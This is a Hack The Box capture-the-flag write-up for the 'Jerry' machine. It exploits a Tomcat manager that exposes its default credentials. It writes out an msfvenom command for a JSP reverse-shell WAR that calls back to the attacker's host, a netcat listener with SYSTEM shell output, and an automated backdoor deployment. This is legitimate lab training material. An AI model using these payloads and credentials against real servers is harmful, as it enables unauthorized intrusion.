HTB - Jerry

Getting Root:

Jerry is running Apache Tomcat on port 8080
Failed login error message shows default creds for the Host Manager App
We upload a reverse JSP shell
We get system on the box and both flags under the same directory

Tools Used:

nmap, msfvenon, tomcatWarDeployer.py

Nmap

nmap -sC -sV -p- -oA nmap/Jerry 10.10.10.95                                                                                                                                                                   
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-01 22:54 EST                                                                                                                                                                               
Nmap scan report for 10.10.10.95                                                                                                                                                                                                              
Host is up (0.041s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Port 8080 Apache Tomcat

Default credentials are shown when we fail to authenticate with admin:admin on the Host Manager App user: tomcat password: s3cret

Generate and upload a JSP Reverse Shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.20 LPORT=9001 -f war > shell.war

Getting the shell

rlwrap nc -lnvp 9001        
listening on [any] 9001 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.95] 49192 
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

C:\apache-tomcat-7.0.88>systeminfo
systeminfo

Host Name:                 JERRY
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00252-00112-46014-AA570
Original Install Date:     6/18/2018, 11:30:45 PM
System Boot Time:          3/2/2020, 12:55:40 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest
Total Physical Memory:     4,095 MB
Available Physical Memory: 3,393 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 4,064 MB
Virtual Memory: In Use:    735 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB

Flags

Both flags are under the same directory

 Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  06:09 AM    <DIR>          .
06/19/2018  06:09 AM    <DIR>          ..
06/19/2018  06:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)  27,577,974,784 bytes free

C:\Users\Administrator\Desktop\flags>

Automating the Exploit

Using an automated tool from github written by mgeeky https://github.com/mgeeky/tomcatWarDeployer

./tomcatWarDeployer.py -U tomcat -P s3cret -H 10.10.14.20 -p 9001 10.10.10.95:8080                                                                                                          
                                                                                                                                                                                                                                              
        tomcatWarDeployer (v. 0.5.2)                                                                                                                                                                                                          
        Apache Tomcat auto WAR deployment & launching tool                                                                                                                                                                                    
        Mariusz B. / MGeeky '16-18                                                                                                                                                                                                            
                                                                                                                                                                                                                                              
Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.                                                                                                                                                      
                                                                                                                                                                                                                                              
INFO: Reverse shell will connect to: 10.10.14.20:9001.                                                                                                                                                                                        
INFO: Apache Tomcat/7.0.88 Manager Application reached & validated.                                                                                                                                                                           
INFO:   At: "http://10.10.10.95:8080/manager"                                                                                                                                                                                                 
INFO: It looks that the application with specified name "jsp_app" has not been deployed yet.                                                                                                                                                  
INFO: WAR DEPLOYED! Invoking it...                                                                                                                                                                                                            
INFO: ------------------------------------------------------------                                                                                                                                                                            
INFO: JSP Backdoor up & running on http://10.10.10.95:8080/jsp_app/                                                                                                                                                                           
INFO:                                                                                                                                                                                                                                         
Happy pwning. Here take that password for web shell: 'sCNUCUbpUYCt'                                                                                                                                                                           
INFO: ------------------------------------------------------------

INFO: Connected with: nt authority\system@JERRY

C:\apache-tomcat-7.0.88> whoami /all

USER INFORMATION
----------------

User Name           SID     
=================== ========
nt authority\system S-1-5-18

According to the wiki, this tool has been tested with the following versions:

TESTED

Apache Tomcat/5.5.35
Apache Tomcat/6.?
Apache Tomcat/7.0.52
Apache Tomcat/7.0.56
Apache Tomcat/8.0.33

PreviousHTB - Bounty NextTryHackMe Writeups

Last updated 5 years ago